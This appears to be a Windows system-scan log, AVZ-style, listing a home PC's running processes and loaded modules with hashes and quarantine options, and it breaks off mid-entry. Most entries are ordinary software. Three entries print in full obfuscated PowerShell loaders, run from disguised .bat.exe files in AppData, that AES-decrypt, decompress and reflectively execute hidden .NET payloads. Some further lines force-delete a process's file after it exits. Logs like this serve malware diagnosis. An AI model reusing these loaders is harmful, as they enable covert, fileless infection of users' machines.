6160LGHUB UpdaterCopyright © Logitech, Inc. 2023AD1486369C58B6E7B45C0CE3E15A5C4F10341.75 kb, rsAh,created: 23.06.2023 12:22:50,modified: 23.06.2023 12:22:46
Command line:
c:\program files\lghub\logi_crashpad_handler.exe
Script: Quarantine, Delete, Delete via BC, Terminate
18696LGHUB Crashpad HandlerCopyright © Logitech, Inc. 2023B251FBDCBD72EE784AAFFEEA6FDBD39E958.25 kb, rsAh,created: 23.06.2023 12:22:50,modified: 23.06.2023 12:22:46
Command line:
c:\program files\lghub\logi_crashpad_handler.exe
Script: Quarantine, Delete, Delete via BC, Terminate
18676LGHUB Crashpad HandlerCopyright © Logitech, Inc. 2023B251FBDCBD72EE784AAFFEEA6FDBD39E958.25 kb, rsAh,created: 23.06.2023 12:22:50,modified: 23.06.2023 12:22:46
Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe
Script: Quarantine, Delete, Delete via BC, Terminate
20968Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.2A311AEB829A5AE4BB6D0FB4D547883A3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56
Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe
Script: Quarantine, Delete, Delete via BC, Terminate
24888Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.2A311AEB829A5AE4BB6D0FB4D547883A3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56
Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe
Script: Quarantine, Delete, Delete via BC, Terminate
22860Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.2A311AEB829A5AE4BB6D0FB4D547883A3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56
Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe
Script: Quarantine, Delete, Delete via BC, Terminate
15480Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.2A311AEB829A5AE4BB6D0FB4D547883A3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56
Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe
Script: Quarantine, Delete, Delete via BC, Terminate
17488Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.2A311AEB829A5AE4BB6D0FB4D547883A3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56
Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe
Script: Quarantine, Delete, Delete via BC, Terminate
22432Microsoft Edge WebView2Copyright Microsoft Corporation. All rights reserved.69953766AA774855005410E3AD01A4EF3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54
Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe
Script: Quarantine, Delete, Delete via BC, Terminate
6408Microsoft Edge WebView2Copyright Microsoft Corporation. All rights reserved.69953766AA774855005410E3AD01A4EF3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54
Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe
Script: Quarantine, Delete, Delete via BC, Terminate
19064Microsoft Edge WebView2Copyright Microsoft Corporation. All rights reserved.69953766AA774855005410E3AD01A4EF3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54
Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe
Script: Quarantine, Delete, Delete via BC, Terminate
22504Microsoft Edge WebView2Copyright Microsoft Corporation. All rights reserved.69953766AA774855005410E3AD01A4EF3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54
Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe
Script: Quarantine, Delete, Delete via BC, Terminate
22072Microsoft Edge WebView2Copyright Microsoft Corporation. All rights reserved.69953766AA774855005410E3AD01A4EF3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54
Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe
Script: Quarantine, Delete, Delete via BC, Terminate
5256Microsoft Edge WebView2Copyright Microsoft Corporation. All rights reserved.69953766AA774855005410E3AD01A4EF3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54
Command line:
c:\program files (x86)\nvidia corporation\nvnode\nvidia web helper.exe
Script: Quarantine, Delete, Delete via BC, Terminate
5200NVIDIA Web Helper ServiceCopyright Node.js contributors. MIT license.67F0001FA4410A89C7393AA5656CCF9A28757.05 kb, rsAh,created: 21.04.2020 17:46:02,modified: 20.01.2023 11:43:31
Command line: "C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" index.js
d:\oculus\support\oculus-runtime\ovrredir.exe
Script: Quarantine, Delete, Delete via BC, Terminate
8296OVR RedirCopyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.6638A1032560A07D5F9C4B8EDDB96AD71110.05 kb, rsAh,created: 06.07.2023 17:34:03,modified: 06.07.2023 17:34:07
Command line:
d:\oculus\support\oculus-runtime\ovrserver_x64.exe
Script: Quarantine, Delete, Delete via BC, Terminate
8136OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.3BA56B9B20C7F7376D04F6D589A1AF848821.55 kb, rsAh,created: 06.07.2023 17:34:03,modified: 06.07.2023 17:34:14
Command line:
d:\oculus\support\oculus-runtime\ovrservicelauncher.exe
Script: Quarantine, Delete, Delete via BC, Terminate
6512OVR Service LauncherCopyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.A2B74491FEA414EB81A66702A4C09A05497.05 kb, rsAh,created: 06.07.2023 17:34:03,modified: 06.07.2023 17:34:14
Command line:
c:\program files\windowsapps\microsoft.yourphone_1.23022.140.0_x64__8wekyb3d8bbwe\phoneexperiencehost.exe
Script: Quarantine, Delete, Delete via BC, Terminate
15404Microsoft Phone Link© Microsoft Corporation. All rights reserved.5BA525138798C396F0A53D18100F8F6E337.93 kb, rsAh,created: 28.03.2023 21:15:49,modified: 28.03.2023 21:15:51
Command line:
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Script: Quarantine, Delete, Delete via BC, Terminate
17304Windows PowerShell© Microsoft Corporation. All rights reserved.B94110F627D2BA6C57EB84A0F9575B27443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(15860);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Script: Quarantine, Delete, Delete via BC, Terminate
19404Windows PowerShell© Microsoft Corporation. All rights reserved.B94110F627D2BA6C57EB84A0F9575B27443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(13932);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Script: Quarantine, Delete, Delete via BC, Terminate
13340Windows PowerShell© Microsoft Corporation. All rights reserved.B94110F627D2BA6C57EB84A0F9575B27443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(17660);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16812Windows PowerShell© Microsoft Corporation. All rights reserved.B94110F627D2BA6C57EB84A0F9575B27443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(16056);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16700Windows PowerShell© Microsoft Corporation. All rights reserved.B94110F627D2BA6C57EB84A0F9575B27443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(16816);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
Registry.exe
Script: Quarantine, Delete, Delete via BC, Terminate
220Xerror getting file info
Command line:
Secure System
Script: Quarantine, Delete, Delete via BC, Terminate
172Xerror getting file info
Command line:
c:\program files\nzxt cam\resources\app.asar.unpacked\node_modules\@nzxt\cam-core\dist\target\x86_64-pc-windows-msvc\release\service.exe
Script: Quarantine, Delete, Delete via BC, Terminate
61728AD5E28A96DCD7D747C2C1711CDE9EAE632.94 kb, rsAh,created: 06.07.2023 00:16:45,modified: 05.07.2023 11:34:42
Command line:
c:\program files\blue sherpa\sherpa_service.exe
Script: Quarantine, Delete, Delete via BC, Terminate
62245B91B726024F50EE28219D0678A8DCE9339.92 kb, rsAh,created: 01.08.2020 11:58:35,modified: 01.08.2020 11:58:35
Command line:
c:\program files (x86)\steam\steam.exe
Script: Quarantine, Delete, Delete via BC, Terminate
13792SteamCopyright (C) 2021 Valve CorporationDFBE353AFC628A41715D502D14EA05C54271.85 kb, rsAh,created: 21.05.2018 19:30:20,modified: 21.07.2023 14:04:18
Command line: "C:\Program Files (x86)\Steam\steam.exe"
c:\program files (x86)\common files\steam\steamservice.exe
Script: Quarantine, Delete, Delete via BC, Terminate
15932Steam Client ServiceCopyright (C) Valve CorporationF3C774E5A943BDA90247B3DFD8EF57C92600.35 kb, rsAh,created: 21.04.2020 17:32:29,modified: 21.07.2023 14:04:18
Command line: "C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe
Script: Quarantine, Delete, Delete via BC, Terminate
10204Steam Client WebHelperCopyright (C) 2014 Valve Corporation4CBE63462BD4B99E0D1E0F1A133FEBE36992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22
Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe
Script: Quarantine, Delete, Delete via BC, Terminate
7860Steam Client WebHelperCopyright (C) 2014 Valve Corporation4CBE63462BD4B99E0D1E0F1A133FEBE36992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22
Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe
Script: Quarantine, Delete, Delete via BC, Terminate
21056Steam Client WebHelperCopyright (C) 2014 Valve Corporation4CBE63462BD4B99E0D1E0F1A133FEBE36992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22
Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe
Script: Quarantine, Delete, Delete via BC, Terminate
15024Steam Client WebHelperCopyright (C) 2014 Valve Corporation4CBE63462BD4B99E0D1E0F1A133FEBE36992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22
Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe
Script: Quarantine, Delete, Delete via BC, Terminate
5312Steam Client WebHelperCopyright (C) 2014 Valve Corporation4CBE63462BD4B99E0D1E0F1A133FEBE36992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22
Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe
Script: Quarantine, Delete, Delete via BC, Terminate
21324Steam Client WebHelperCopyright (C) 2014 Valve Corporation4CBE63462BD4B99E0D1E0F1A133FEBE36992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22
Command line:
c:\users\isaac\appdata\roaming\tdsul.bat.exe
Script: Quarantine, Delete, Delete via BC, Terminate
15860Windows PowerShell© Microsoft Corporation. All rights reserved.FC02C8A46596C09687741EB41AC48674411.00 kb, rSaH,created: 23.07.2023 02:12:17,modified: 07.05.2022 00:20:22
Command line: "C:\Users\Isaac\AppData\Roaming\tDSul.bat.exe" $PrEI='MaHHDxinHHDxModHHDxuHHDxleHHDx'.Replace('HHDx', '');$aREe='TrHHDxaHHDxnsHHDxfoHHDxrmFiHHDxnalHHDxBloHHDxckHHDx'.Replace('HHDx', '');$Gvgk='InvHHDxoHHDxkeHHDx'.Replace('HHDx', '');$LtTR='FiHHDxrstHHDx'.Replace('HHDx', '');$ZgSU='CrHHDxeateHHDxDeHHDxcrHHDxyptHHDxorHHDx'.Replace('HHDx', '');$YSxT='CHHDxhangHHDxeEHHDxxHHDxtHHDxeHHDxnsioHHDxnHHDx'.Replace('HHDx', '');$fKSF='ReHHDxadLiHHDxnesHHDx'.Replace('HHDx', '');$xAyL='SHHDxpHHDxliHHDxtHHDx'.Replace('HHDx', '');$Vzkv='EnHHDxtHHDxrHHDxyPHHDxoHHDxiHHDxntHHDx'.Replace('HHDx', '');$fnBm='FrHHDxomHHDxBaseHHDx64HHDxStHHDxringHHDx'.Replace('HHDx', '');$Psuz='GeHHDxtCuHHDxrreHHDxntHHDxPrHHDxoHHDxcesHHDxsHHDx'.Replace('HHDx', '');$fnDF='LHHDxoadHHDx'.Replace('HHDx', '');function tnErk($Wlyep){$DXKAy=[System.Security.Cryptography.Aes]::Create();$DXKAy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$DXKAy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$DXKAy.Key=[System.Convert]::$fnBm('ry9GUVCx258nQ7DsjJDFsfvglh0Vz9cnANJgttim66A=');$DXKAy.IV=[System.Convert]::$fnBm('6aTj73IRz+Lv6PJ0wxKX4A==');$xHagb=$DXKAy.$ZgSU();$LJfRU=$xHagb.$aREe($Wlyep,0,$Wlyep.Length);$xHagb.Dispose();$DXKAy.Dispose();$LJfRU;}function hNSbn($Wlyep){$RsPel=New-Object System.IO.MemoryStream(,$Wlyep);$PYnIK=New-Object System.IO.MemoryStream;$kQDoC=New-Object System.IO.Compression.GZipStream($RsPel,[IO.Compression.CompressionMode]::Decompress);$kQDoC.CopyTo($PYnIK);$kQDoC.Dispose();$RsPel.Dispose();$PYnIK.Dispose();$PYnIK.ToArray();}$Tgnkw=[System.Linq.Enumerable]::$LtTR([System.IO.File]::$fKSF([System.IO.Path]::$YSxT([System.Diagnostics.Process]::$Psuz().$PrEI.FileName, $null)));$FGZNF=$Tgnkw.Substring(3).$xAyL(':');$oBRiH=hNSbn (tnErk ([Convert]::$fnBm($FGZNF[0])));$tpcvV=hNSbn (tnErk ([Convert]::$fnBm($FGZNF[1])));[System.Reflection.Assembly]::$fnDF([byte[]]$tpcvV).$Vzkv.$Gvgk($null,$null);[System.Reflection.Assembly]::$fnDF([byte[]]$oBRiH).$Vzkv.$Gvgk($null,$null);
c:\users\isaac\appdata\roaming\tmaie.bat.exe
Script: Quarantine, Delete, Delete via BC, Terminate
13932Windows PowerShell© Microsoft Corporation. All rights reserved.FC02C8A46596C09687741EB41AC48674411.00 kb, rSaH,created: 11.04.2023 21:19:39,modified: 07.05.2022 00:20:22
Command line: "C:\Users\Isaac\AppData\Roaming\tMaIE.bat.exe" $fdxF='TrKRgYansKRgYforKRgYmFinKRgYalBKRgYlocKRgYkKRgY'.Replace('KRgY', '');$CKDY='EnKRgYtryKRgYPoKRgYintKRgY'.Replace('KRgY', '');$PvqB='FrKRgYomBaKRgYsKRgYe6KRgY4KRgYSKRgYtKRgYrKRgYiKRgYngKRgY'.Replace('KRgY', '');$VUbu='ChKRgYanKRgYgeKRgYExKRgYtKRgYensKRgYiKRgYonKRgY'.Replace('KRgY', '');$CgYQ='InvKRgYokKRgYeKRgY'.Replace('KRgY', '');$xOpm='SplKRgYitKRgY'.Replace('KRgY', '');$YdcC='LoaKRgYdKRgY'.Replace('KRgY', '');$asUp='RKRgYeadKRgYLiKRgYneKRgYsKRgY'.Replace('KRgY', '');$YxDA='CKRgYreKRgYaKRgYteDKRgYecKRgYrypKRgYtorKRgY'.Replace('KRgY', '');$axDS='FirKRgYstKRgY'.Replace('KRgY', '');$JyLQ='MaiKRgYnMKRgYoduKRgYleKRgY'.Replace('KRgY', '');$TQuP='GetKRgYCuKRgYrKRgYrenKRgYtPrKRgYoKRgYceKRgYssKRgY'.Replace('KRgY', '');function IPKzZ($BgAHr){$hofSw=[System.Security.Cryptography.Aes]::Create();$hofSw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hofSw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hofSw.Key=[System.Convert]::$PvqB('S5FfqpbWy9YZf9pni8bPrMfCyD6Aw8PkuVCr3TKCoU0=');$hofSw.IV=[System.Convert]::$PvqB('J3Tz/aUwtodoHrt4N+o9yQ==');$CZjcp=$hofSw.$YxDA();$DEcRy=$CZjcp.$fdxF($BgAHr,0,$BgAHr.Length);$CZjcp.Dispose();$hofSw.Dispose();$DEcRy;}function hcbBw($BgAHr){$QJpza=New-Object System.IO.MemoryStream(,$BgAHr);$RRoPM=New-Object System.IO.MemoryStream;$GcMxE=New-Object System.IO.Compression.GZipStream($QJpza,[IO.Compression.CompressionMode]::Decompress);$GcMxE.CopyTo($RRoPM);$GcMxE.Dispose();$QJpza.Dispose();$RRoPM.Dispose();$RRoPM.ToArray();}$bKplR=[System.Linq.Enumerable]::$axDS([System.IO.File]::$asUp([System.IO.Path]::$VUbu([System.Diagnostics.Process]::$TQuP().$JyLQ.FileName, $null)));$FaxOh=$bKplR.Substring(3).$xOpm(':');$cRKCf=hcbBw (IPKzZ ([Convert]::$PvqB($FaxOh[0])));$xJTIT=hcbBw (IPKzZ ([Convert]::$PvqB($FaxOh[1])));[System.Reflection.Assembly]::$YdcC([byte[]]$xJTIT).$CKDY.$CgYQ($null,$null);[System.Reflection.Assembly]::$YdcC([byte[]]$cRKCf).$CKDY.$CgYQ($null,$null);
c:\program files\virtual desktop\virtualdesktop.service.exe
Script: Quarantine, Delete, Delete via BC, Terminate
6192Virtual Desktop ServiceCopyright © Virtual Desktop, Inc. 2014-2022312DF874CE11F4078662622310E074E510407.71 kb, rsAh,created: 16.12.2022 13:24:54,modified: 16.12.2022 13:24:54
Command line:
c:\program files\windowsapps\microsoftwindows.client.webexperience_423.8900.0.0_x64__cw5n1h2txyewy\dashboard\widgets.exe
Script: Quarantine, Delete, Delete via BC, Terminate
11036© Microsoft Corporation. All rights reserved.E4AF9A94CEBD6FF01F1D933ED72B29102138.74 kb, rsAh,created: 05.04.2023 18:07:33,modified: 05.04.2023 18:07:36
Command line:
c:\program files\windowsapps\microsoftwindows.client.webexperience_423.8900.0.0_x64__cw5n1h2txyewy\dashboard\widgetservice.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16268EEE1208CA71B80E786D708F203375866179.29 kb, rsAh,created: 05.04.2023 18:07:33,modified: 05.04.2023 18:07:36
Command line:
c:\users\isaac\appdata\roaming\xtuvv.bat.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16816Windows PowerShell© Microsoft Corporation. All rights reserved.B94110F627D2BA6C57EB84A0F9575B27443.50 kb, rSaH,created: 23.07.2023 13:15:56,modified: 05.05.2023 07:56:03
Command line: "C:\Users\Isaac\AppData\Roaming\xtuvv.bat.exe" -w hidden -c $XRwR='EnteKHcreKHcyPeKHcoieKHcnteKHc'.Replace('eKHc', '');$JXEu='GeteKHcCueKHcrreKHceneKHctPeKHcroeKHcceeKHcsseKHc'.Replace('eKHc', '');$VrxS='MeKHcaineKHcMoeKHcdueKHcleeKHc'.Replace('eKHc', '');$hmqz='TreKHcaneKHcsfoeKHcrmFeKHcinaleKHcBloeKHcceKHckeKHc'.Replace('eKHc', '');$CquX='SpleKHciteKHc'.Replace('eKHc', '');$qFmP='LeKHcoeKHcaeKHcdeKHc'.Replace('eKHc', '');$EtZB='CeKHcreateKHceDeKHcecryeKHcpeKHctoeKHcreKHc'.Replace('eKHc', '');$pXCM='CeKHchangeKHceeKHcEeKHcxteneKHcsioeKHcneKHc'.Replace('eKHc', '');$xgQY='FieKHcrseKHcteKHc'.Replace('eKHc', '');$xSKJ='FroeKHcmeKHcBaeKHcseeKHc64SeKHctrieKHcngeKHc'.Replace('eKHc', '');$PatU='IneKHcvokeeKHc'.Replace('eKHc', '');$TNPx='ReKHceadeKHcLeKHcieKHcneseKHc'.Replace('eKHc', '');function MvpiL($ktOmn){$YXOrJ=[System.Security.Cryptography.Aes]::Create();$YXOrJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YXOrJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YXOrJ.Key=[System.Convert]::$xSKJ('aX8cFQObeptl0Hc2tA0iQqDR9yEcFcjuIlC6FeX9Xos=');$YXOrJ.IV=[System.Convert]::$xSKJ('tojFzsW/v/Dm+adS5TQ3Mg==');$CCPCO=$YXOrJ.$EtZB();$cGSky=$CCPCO.$hmqz($ktOmn,0,$ktOmn.Length);$CCPCO.Dispose();$YXOrJ.Dispose();$cGSky;}function ivaas($ktOmn){$zolTr=New-Object System.IO.MemoryStream(,$ktOmn);$alxWJ=New-Object System.IO.MemoryStream;$yVdFW=New-Object System.IO.Compression.GZipStream($zolTr,[IO.Compression.CompressionMode]::Decompress);$yVdFW.CopyTo($alxWJ);$yVdFW.Dispose();$zolTr.Dispose();$alxWJ.Dispose();$alxWJ.ToArray();}$yjiqq=[System.Linq.Enumerable]::$xgQY([System.IO.File]::$TNPx([System.IO.Path]::$pXCM([System.Diagnostics.Process]::$JXEu().$VrxS.FileName, $null)));$DPSuV=$yjiqq.Substring(3).$CquX(':');$UWCTr=ivaas (MvpiL ([Convert]::$xSKJ($DPSuV[0])));$bpToC=ivaas (MvpiL ([Convert]::$xSKJ($DPSuV[1])));[System.Reflection.Assembly]::$qFmP([byte[]]$bpToC).$XRwR.$PatU($null,$null);[System.Reflection.Assembly]::$qFmP([byte[]]$UWCTr).$XRwR.$PatU($null,$null);
c:\program files\windowsapps\microsoft.yourphone_1.23022.140.0_x64__8wekyb3d8bbwe\yourphoneappproxy.exe
Script: Quarantine, Delete, Delete via BC, Terminate
16472YourPhoneAppProxy© Microsoft Corporation. All rights reserved.E0FBE7E71C802EB4181F147C91A9DC86160.93 kb, rsAh,created: 28.03.2023 21:15:49,modified: 28.03.2023 21:15:53
Command line:
Detected:290, recognized as trusted 195
Module nameHandleDescriptionCopyrightInformationUsed by processes
C:\Program Files (x86)\bookingDesktopApp\Update\1.3.99.0\bookingDesktopApppdate.dll
Script: Quarantine, Delete, Delete via BC
1929641984bookingDesktopApp UpdateCopyright 2007-2010 Google Inc.MD5=BC86F38DD098C14DD93138458314851F
1703.50 kb, rsAh, created: 29.09.2020 19:53:39, modified: 29.09.2020 19:53:39
4412, 23568, 25520
C:\Program Files (x86)\bookingDesktopApp\Update\1.3.99.0\psmachine.dll
Script: Quarantine, Delete, Delete via BC
1625686016bookingDesktopApp UpdateCopyright 2007-2010 Google Inc.MD5=D1E6E619838C514AAAB7B6EF0359C9DC
194.50 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39
23568, 25520
C:\Program Files (x86)\Common Files\Steam\SteamService.dll
Script: Quarantine, Delete, Delete via BC
1688338432Steam Client Service LibraryCopyright (C) Valve CorporationMD5=97AFC6497E6BB53003233A683A191766
3302.35 kb, rsAh, created: 21.04.2020 17:33:45, modified: 21.07.2023 14:04:18
15932
C:\Program Files (x86)\GIGABYTE\AppCenter\BDR_info.dll
Script: Quarantine, Delete, Delete via BC
1820065792BDR_info DLLCopyright (C) 2013MD5=5722FE6AD03BC2BDA2DEDC6B0BB1E741
1824.00 kb, rsAh, created: 20.08.2021 10:16:18, modified: 20.08.2021 10:16:18
13820
C:\Program Files (x86)\Steam\bin\chromehtml.DLL
Script: Quarantine, Delete, Delete via BC
1693319168  MD5=9AD781B001016B4D1484695771E10A02
1283.85 kb, rsAh, created: 21.04.2020 17:33:21, modified: 21.07.2023 14:04:18
13792
C:\Program Files (x86)\Steam\bin\filesystem_stdio.DLL
Script: Quarantine, Delete, Delete via BC
1695612928FileSystem_Stdio.dllCopyright (C) 2005 Valve CorporationMD5=6D9FFD067DF623F803A42A3284E91417
192.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:18
13792
c:\program files (x86)\steam\bin\friendsui.DLL
Script: Quarantine, Delete, Delete via BC
1585577984Steam Friends UICopyright (C) 2005 Valve CorporationMD5=849F8594912B5200593ABAC6B4EFC4A3
5168.85 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:18
13792
c:\program files (x86)\steam\bin\serverbrowser.DLL
Script: Quarantine, Delete, Delete via BC
1583415296Steam Server Browser LibraryCopyright (C) 2008 Valve CorporationMD5=92876D97AC1B8BFEF423ACFB0D13BC5B
2074.85 kb, rsAh, created: 21.04.2020 17:33:20, modified: 21.07.2023 14:04:18
13792
C:\Program Files (x86)\Steam\bin\vgui2_s.DLL
Script: Quarantine, Delete, Delete via BC
1694695424vgui2_s.dllCopyright (C) 2007 Valve CorporationMD5=2743F0DEEC31FC8DC4C38326D73EA503
821.85 kb, rsAh, created: 21.04.2020 17:33:21, modified: 21.07.2023 14:04:20
13792
C:\Program Files (x86)\Steam\crashhandler.dll
Script: Quarantine, Delete, Delete via BC
1787559936Steam Crash Handler LibraryCopyright (C) 2010MD5=CCD6B4040498011B1126C53C31995585
367.35 kb, rsAh, created: 21.04.2020 17:33:20, modified: 21.07.2023 14:04:20
13792
C:\Program Files (x86)\Steam\libavcodec-58.dll
Script: Quarantine, Delete, Delete via BC
1706033152  MD5=167C2B83570F85067FCD269DC8BDB6EB
4807.85 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50
13792
C:\Program Files (x86)\Steam\libavformat-58.dll
Script: Quarantine, Delete, Delete via BC
1704460288  MD5=5D29247B61B3B2A53C28505F92D9B940
1469.85 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50
13792
C:\Program Files (x86)\Steam\libavresample-4.dll
Script: Quarantine, Delete, Delete via BC
1703804928  MD5=43A5181DBC20F32106F44D9D493069C1
578.35 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50
13792
C:\Program Files (x86)\Steam\libavutil-56.dll
Script: Quarantine, Delete, Delete via BC
1698758656  MD5=7CDEB2075BDE3B7CD500E50E87D291F1
1263.85 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50
13792
C:\Program Files (x86)\Steam\libswscale-5.dll
Script: Quarantine, Delete, Delete via BC
1702690816  MD5=45A8D508888723E9BAD97672887676D7
1020.35 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50
13792
C:\Program Files (x86)\Steam\SDL3.dll
Script: Quarantine, Delete, Delete via BC
1721958400SDLCopyright (C) 2023 Sam LantingaMD5=0F9836D1D3914BCE9B40268524A3FEF6
1289.85 kb, rsAh, created: 12.01.2023 17:46:16, modified: 21.07.2023 14:04:18
13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\vrclient.dll
Script: Quarantine, Delete, Delete via BC
1580335104VR ClientCopyright (C) Valve CorporationMD5=E4D6DF1D539330BC8A060145C58C13DE
2896.31 kb, rsAh, created: 16.03.2023 15:26:42, modified: 13.07.2023 18:16:04
13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\aitcamlib.dll
Script: Quarantine, Delete, Delete via BC
1570570240  MD5=AACE32D89210F739CE24A9E298DCD730
164.81 kb, rsAh, created: 16.03.2023 15:26:42, modified: 13.07.2023 18:16:06
13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\AitH264Capture.dll
Script: Quarantine, Delete, Delete via BC
234029056AitH264Capture Dynamic Link LibraryCopyright (C) 2010MD5=26AE17211BEADDAA7DC5E909EF31A323
315.00 kb, rsAh, created: 21.04.2020 20:46:48, modified: 21.04.2020 20:46:48
13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\AitUVCExtApi.dll
Script: Quarantine, Delete, Delete via BC
234487808AitUVCEx Dynamic Link LibraryCopyright (C) 2009MD5=BCD4F07BB1D8E0402C9D0E114FCD7E51
164.00 kb, rsAh, created: 21.04.2020 20:47:08, modified: 21.04.2020 20:47:08
13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\driver_lighthouse.dll
Script: Quarantine, Delete, Delete via BC
1570766848Lighthouse DriverCopyright (C) Valve CorporationMD5=D5223C2F6BE8F71346CE5F7B039785D0
2021.31 kb, rsAh, created: 16.03.2023 15:26:42, modified: 13.07.2023 18:16:04
13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\vrcamera_api.dll
Script: Quarantine, Delete, Delete via BC
1570045952  MD5=D97550E81D41480D609F0D3A2B928120
476.31 kb, rsAh, created: 16.03.2023 15:26:42, modified: 13.07.2023 18:16:04
13792
C:\Program Files (x86)\Steam\steamclient.dll
Script: Quarantine, Delete, Delete via BC
